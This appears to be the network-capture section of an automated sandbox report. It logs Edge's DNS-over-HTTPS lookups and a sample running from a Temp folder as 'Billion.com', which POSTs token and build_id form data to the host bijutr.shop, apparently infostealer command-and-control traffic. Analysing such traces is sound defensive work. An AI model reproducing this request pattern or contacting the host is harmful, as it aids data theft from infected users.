                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC1390INData Raw: a5 20 e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67
                                                                                                                                                                                                                                                                                                        Data Ascii: 1v=K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC1390INData Raw: 02 c0 b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6
                                                                                                                                                                                                                                                                                                        Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC1390INData Raw: 08 3f f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31
                                                                                                                                                                                                                                                                                                        Data Ascii: ?AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC1390INData Raw: 0b c5 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5
                                                                                                                                                                                                                                                                                                        Data Ascii: DsQNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYy


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        22192.168.2.649968162.159.61.34437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:28 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6bcbac64213-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f5 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom c)


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        23192.168.2.649969162.159.61.34437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:28 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6bcbd56191e-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f1 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        24192.168.2.649972172.64.41.34437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:27 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:28 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6bcba860f6b-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 24 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom$()


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        25192.168.2.649976162.159.61.34437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:28 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6bd4c9e159b-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0c 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomP#)


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        26192.168.2.649987162.159.61.34437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:28 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6bdc83e7d1c-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 16 00 04 8e fb 28 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        27192.168.2.649992172.64.41.34437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:28 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6be08e10f41-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 26 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom&A)


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        28192.168.2.649990188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HVAI58YMYMYU379R9HDB
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 3165
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:28 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 39 52 39 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 39 52 39 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 39 52 39 48 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------HVAI58YMYMYU379R9HDBContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------HVAI58YMYMYU379R9HDBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------HVAI58YMYMYU379R9HDBCont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:29 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
